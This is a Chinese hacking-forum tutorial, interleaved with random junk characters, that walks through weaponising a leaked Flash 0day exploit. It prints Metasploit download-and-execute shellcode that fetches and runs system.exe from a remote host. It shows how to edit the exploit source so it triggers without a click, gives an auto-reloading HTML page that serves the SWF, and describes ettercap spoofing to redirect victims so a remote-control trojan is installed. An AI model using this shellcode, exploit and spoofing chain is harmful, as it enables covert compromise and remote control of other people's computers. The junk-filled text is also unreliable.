& z" ?" Y+ ?8 X- J
三、flash 0day之手工代码修改制作下载者实例入侵演示
, K0 Z8 w# j# o% A5 z" d n
- k5 w/ j2 E$ w
$ U5 j+ S0 |; Z( P8 I6 y3 S+ | 利用到的工具:
( N8 I; a. |$ o! I" h' @
u' N0 }! A) M( {
2 v% K% g, [0 H2 e. @. y" Y Msf
/ }1 O0 j% ~- D6 |7 z- u
5 S$ G( n9 t3 v4 [) f$ o& ]* l# i M# z( z
Ettercap - U. K# P7 ~" ~4 Y! {
+ X/ S* A. n' ^0 c7 k7 f; d
a- X/ b$ B4 E( A
Adobe Flash CS6
( _9 ]& y4 e: D* R8 `& k) ]
! _ {' j d* Y7 g: Y5 u
0 x- a( e% {8 K: T y Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
7 _4 L5 K" m% Y, k1 o" K7 F ; S$ R% `9 S' M( x" k6 b
5 [1 c6 j u" j. g' \+ h) x- t
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
`9 [: I" X, L! T * @& }- v4 w- c+ {; T ^( j
% G2 c+ _) l# O5 d# o; C 如图: 9 p! g8 Z" ]2 h
$ T: j& D& X- y2 O( E+ T
, w }2 c% i: A o4 m5 J 7 B% q) \2 h2 ?5 K- \5 V
9 @% e' H7 G6 y9 z
3 [7 _/ k* R( p/ g( k6 Q, p7 A
' K% B1 d% r& H/ M& F8 r: b2 z: r + [% i- f$ Q# y6 ]6 e
% h/ g3 |( b5 s5 ^ s) o 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
8 F7 n) L8 T% j1 ~
2 S1 ~0 A- O- q$ f0 |, G
# }. }. F* \% R% i- L3 j) v2 M: R
% \4 F: [6 ]0 p% J! ^) k! v $ n7 X" M2 ^" P* {
" L F4 E+ u% u
3 y( z8 ]7 s( Y
4 E; k0 {+ o2 R! N
3 N' O, k* K0 x7 W9 l 然后执行generate -t dword生成shellcode,如下:
) b9 V8 }/ |5 p, T+ _2 P) i' q3 K; ]
5 c6 u3 \# k- O3 U4 ` ~$ n: q# S6 f* @
5 O1 j# h- m! B# r: P3 Q1 {
c" d f2 W5 U+ g1 z: ?4 K, B! y' Z2 w1 f' R
复制代码到文本下便于我们一会编辑flash exp,如下: 2 G/ F# m5 y) n2 o( j
) w J) l2 Z% X% [; z) J
6 E# T0 @+ I! i; U+ F+ |
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
( p! x" {+ @% Z' x9 E9 ~
2 t0 ~7 s: r0 u) G0 a. U
K+ \5 G4 v1 |4 Q: ^6 m 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ' P( w! ^8 y$ j4 s
) M0 P7 s, Q, W& o X& s4 C9 |
, g8 ]* i0 [) a+ j8 ^8 ~; z/ ^6 m 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
' \' e. e: p* v
6 _5 Q! y8 [, |9 }' r
+ J8 T2 l3 Y' U" y+ _5 \2 o+ v3 R) T 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, + `; R/ \/ J# f( E
1 N& S9 w7 Q) A2 P! G5 M( e8 \
! y4 t! ]( s! W5 M4 V- Z
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
3 h7 C. k* H& Z$ @& C4 o4 ~
7 p/ K4 e1 v7 V( h4 ]
, o1 o* _3 _7 \( B$ ^5 Y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
9 b' d8 t0 h* [4 D$ N0 G 6 p/ F* n( \$ p& E$ `4 j8 o S5 y
: E+ w* `' F# [' r( z3 q 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, & O1 O/ l Q+ _$ S
* b* y6 ]1 G8 t0 l7 D1 u
! t1 q U7 B* }4 D% w 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
$ R0 ]" g {/ B! ~' u
& l8 Z X6 p& g) m9 [7 M) W( r* R6 V3 ]
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
# x( e7 h* n S! C
, f D! u( `2 c3 `) S, C# ^5 B5 @2 W; Q2 H
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, , j) K) M- ^- t% Q4 _" i2 O+ T0 \
: i6 l& V- `$ f# K! B a* J' K1 d
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, " k( c+ j; K' p E& T! z8 Y: o, C0 L
* U- c0 p$ g* k$ j0 _: }2 h. @" K( p# x
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
% M5 H8 t8 `+ Y2 L
9 `) k* ?% v% z4 t8 p/ k
+ u# a( ]; o1 w; V3 Q 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 4 T1 R% `: Y- @* U- Y: b
0 D- S- g6 l4 s7 \8 [6 h
3 o/ I$ [& T% v. O# v 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 0 h( A* Q+ K% q& e0 s f( i
# h2 p% E! [! c; `/ B( L; ~( j$ ]3 K
5 H& x# D+ ~" P/ ~( e0 X# v
$ c- a6 q* I2 x
$ G5 {. F! u2 G9 g . v. r. D3 u1 L H4 o! a5 k
0 ~9 {, d& D9 b( _7 c2 ?" {( I9 {
& {# N0 y7 a4 K, f: c$ S 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 1 O' A( i1 k( S( Z
) t$ s% Z) B7 ?7 f R
8 r9 ~: c N3 ]9 \1 @- N
$ w# n5 z) p" ~/ N
$ q) e) @2 W: E$ Y7 A1 t
' X' B% O% g$ q- e4 k
先修改ShellWin32.as,部分源代码如图:
?# R- k& k( _1 g( |) Q& S8 ]
' {! K' b8 x" P) e, H8 o7 r7 U) N3 D
0 H/ ]% n D. G' h4 h \
- c. M, ]1 c! F % u% b: D( G9 m0 t
) K* I+ }; L" e8 c+ C3 K
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 1 j) o: w( ^9 i( y
6 ^. y/ y/ h, G4 e4 I, k
$ ^ g' _; ~4 C/ \5 G
5 M& Q( ~* T* F
/ W4 ~0 m s; b( l9 L3 g4 M7 {) U+ q0 w6 \/ K
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ; U" p# z n" j1 B7 a1 O+ ^5 g
5 {0 V& V9 y6 Y; S" }1 z- l- O& M
! X( E9 `, r7 C2 M# `
# _3 M9 w2 X8 }/ A ? , g( l, U T. C' W4 z: O5 H
" z, X" Z/ A% Y4 o5 {6 D! T
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
3 {0 U8 m9 o0 e% p& M$ N 0 T- x0 Y' S1 W8 s/ T; w5 h9 N5 f6 z
( W7 N+ D$ }4 M& }5 g2 L
3 k6 O, o9 H. E! @; P
) ]) t9 [6 H, e! J) [7 L$ M3 X L# S! L! @
% w' Y- o1 k' f7 T/ H7 T3 [
- w* q& D: r6 q2 }4 t8 u$ I- A+ i1 K% t) t
; B4 w1 c4 u$ s' N& p
9 h7 c- H, e) S) @
( o: }2 T6 S, c' b
然后点保存,下面我们来编译一下,打开
# A1 m/ z4 ~9 M* ]& S. N
8 X4 p/ v0 F8 `4 k- ` U! ~4 ]& w( c% K1 ^
exp1.fla然后点文件-发布,看看编译没错误
" J, `7 g6 W6 N0 [# J% s
: T% y2 Q8 W' G5 H+ u
# x2 x3 J8 ]9 C. Y
; r. L9 h- U* \6 B" b# C2 I 0 i7 X( n( N, i% }6 _4 E+ i% l
4 z+ |5 _& Y6 m0 M0 E1 r
1 C: o9 ?& m% S: @
+ X. q% E4 G3 r4 P$ ~" F
2 ]9 |8 G7 ~3 F+ G+ K
8 G% V# e3 ]$ `6 z, O. s: w
1 B7 u2 n+ G, K- ^- Q/ N
3 A3 J& B0 U: B- U / d% h! ^# ~4 t8 I3 f- U
0 N" N; x! B; U9 b/ T3 E( ?
6 r# u. O8 v( i2 L 然后我们把生成的
/ h7 y+ |# z) y4 Q+ ]' T
3 B) e" a/ `* t" M! K& x: K- p* T# W7 d i- d* b, g
exp1.swf丢到kailinux 的/var/www/html下:
$ _/ R& G* l8 ?* ?) D# \# ?7 V
% e; |) E% j+ J Q! P- _; [% Z
, }& `( ~& n0 U' x8 ` 然后把这段代码好好编辑一下 2 c6 b# i; o/ @' H& y, ?
0 C% o% z$ P. ~/ J$ l
, ]( N* e, b% ^4 ?$ z/ e* I ) W; ]8 X0 q1 s
1 v8 p& Y% s, x# b5 V# g- {
- q0 t- R( O+ o) ~3 y
" |7 Z9 S8 V8 V4 Y$ j6 f
9 d. k, @- |7 X) {- z Z
3 k! R( u- N( N, p " C- n8 b4 s- J& `6 N n' d' w
- r# i9 O' [5 d0 E7 J
k% _! V/ h+ h6 V+ U $ L+ Q1 r. @4 E
" R( Q C1 b& C- g o) f
. k& b' _ q" H5 l$ b' ?, j
+ P' d* N8 \- ?# g9 G
t9 T0 m8 }7 A1 t: ~5 {7 U1 z6 E" E! F; J2 w" ]
7 Z# @5 k6 M9 W+ b9 F
: l5 [5 S' Z6 b1 E1 e" L
2 f9 B$ b4 X! e z& J <!DOCTYPE html> + `2 m! z" O+ w A' v2 r* p) @. y5 U" k) z
. A- e7 }/ m5 B9 p# }1 [! Q R& K( y$ a; e3 D
<html> ; \& `. [5 j$ _4 x. ]
+ t' s6 r* d5 v; i' ]
0 W$ d6 W/ K% j! w <head> 0 M9 J5 L1 \+ j$ ?4 T" R# \
2 v) R. H2 P0 A4 M! B! j) ~# }2 K0 b3 A; A
<meta http-equiv="Content-Type" content="text/html;
. R" {! |: a6 u7 k1 H& {( Y
. [" m2 r- b2 Z) H$ g$ R# j" X* u* `7 v- k; m% A
charset=utf-8"/> 3 k7 p9 k+ f" c* Z. q" c/ i
9 w5 e' ^. _+ k
% K p/ i5 y, a/ l9 f </head>
2 }& m1 I0 ~9 Y6 l# X* {
. U3 j9 _) [1 u7 V* B3 |6 L5 _( c% `3 E# Y! p
<body> $ I" Z; }5 s* x0 v1 e
/ x: |; K3 r) k$ x# p m. g
, g7 u; D% ^$ c5 w( e$ f7 ~ W
<h2> Please wait, the requested page is loading...</h2> . [" K3 L& b; s& C) f( A. f
( _5 @, H- p1 A e; O
( y1 {: `9 J3 m8 @ <br>
, B# M! e; F5 H1 L/ Q( @- }" S, Y- D
" f8 ]0 e: ?& i4 a, u" U( F7 y0 v6 Z9 M' p2 m3 U v" \$ A/ o
<OBJECT
! K6 S* ^. D* U; M( \% | % r: W ?4 r) u5 r
1 L3 J4 z" u. _ classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie - A( O8 Q9 `- p6 z0 D' Q$ u
- w( e' f a7 d; ^; W- m# o6 i0 {6 t3 \. [) V. o I
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
3 c7 f; _3 l7 l1 U5 h
! u: K, e) C8 T8 U5 F* C
. v- S- P6 k) o i% [ </body>
8 s+ {. [& L) |& J + D' j8 w# `# t8 @8 P
- u @' ]0 a4 A6 S <script> ( \8 ^3 {9 `. u# N% h, s; p. m
, m, X: ]6 \2 c$ Z# Z; [0 z& w, H8 {( W% x& S8 O8 q
setTimeout(function () {
; g* d9 K% L) O" a, r # I8 a: b; A4 ~( U6 Y
* K k) U# }5 j# e6 z! O4 i 8 r- t( m4 g) Y$ S# ~' `1 X3 Z
2 `' ]% i8 ?; v4 Q, y
( Q' E7 v) L0 _/ {% _1 @ window.location.reload(); % R- l" Q4 s0 Q) N$ p( y0 D3 e
" g# J3 Y8 \6 ]+ k m9 m& E5 D. g
7 K$ W1 k0 a' g! \1 y, ], a }, 10000);
+ T+ E, [. }( d& H & }3 f% y7 T5 g! r' k
/ ?8 D7 b3 j+ R) E
+ I+ c3 m1 v5 l: G / P, Q/ @+ n* P3 G* P
9 f; W2 p2 F4 q2 j </script>
: {+ n0 |3 j4 ^9 M5 j% ^7 T
' N+ v5 I5 k6 ~5 v$ o w A
. ^: I& o/ z* J* d/ X </html>
+ c! m, c5 @- z2 y6 w
% z' s, `& v, |6 v. F: n6 X
- {9 D% u+ |3 e5 ?8 G/ t
+ {" ~6 d4 q6 X$ m! S ; I! c; [: U# c, t: a5 H: c" K
- F; `2 r6 [# a7 ]7 G1 C 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
# Z9 S5 Z$ L# E' ]$ `* d . M* Z( r0 X4 I
1 B# u" V- m! Y
* L4 z+ K0 L0 X. Z; L * H# `5 r4 A g; }
c& }6 }/ E0 M7 G% X1 y$ ~ # p6 P' g3 A& f) a" B
: ^. l; V- f+ |
8 K* S# I7 m5 R- k7 o4 _+ Y$ Q
: n6 j' q- k4 K# D; j$ }0 f* | 9 R6 l/ o7 P7 I
& [7 ]- f4 D/ ~8 K6 s2 g: T
2 M# M$ r' \7 X }7 [2 [ $ L! b, e# j: E6 s/ S. r& b- k
# N( X0 v) @9 d2 Y 6 Q+ N1 F3 w2 L
, @2 ~$ k" S- J. c2 [; C3 a% N
0 B7 ?+ }+ U8 N: A+ ~ 下面我们用ettercap欺骗如图: # d& C: ?2 n% E$ }1 P& R
. ~: A1 |' M+ F' H6 H! n
0 J$ J3 T, T& ~: s9 J
0 K9 Q' x. x/ }8 C( d/ l y
" y% u5 @) M; Z! E: L
6 o q5 D: E" [0 a2 `9 v % k0 M; q1 ~2 q1 O! X) c
$ b' i: l* A T5 A4 ~
2 g( `+ C: |# k* k 下面我们随便访问个网站看看: / f0 Z4 _ k: W9 ]" D
, r+ | D; `, _1 O3 t% s- A8 o2 M
8 L* @% d6 _6 Q: P' F; v 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: # a* n! ^; [" r+ @2 v `, Z
. N+ Q5 ^- j4 d5 ~0 g C! Z
9 F: x. A% Z3 R f4 a
+ {7 E+ S# a" K& @! r; Z q 5 [. m. l( q( R9 L5 s7 T
) J- a/ K6 I) j% M7 Y( g* k 我们看另一台, . `# r6 `6 _9 n/ f- \
6 ]3 R% \+ O, O x: q8 {. n- W9 ]
4 D; @- }: h7 e
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
7 l: g' ?7 j6 p* G4 U |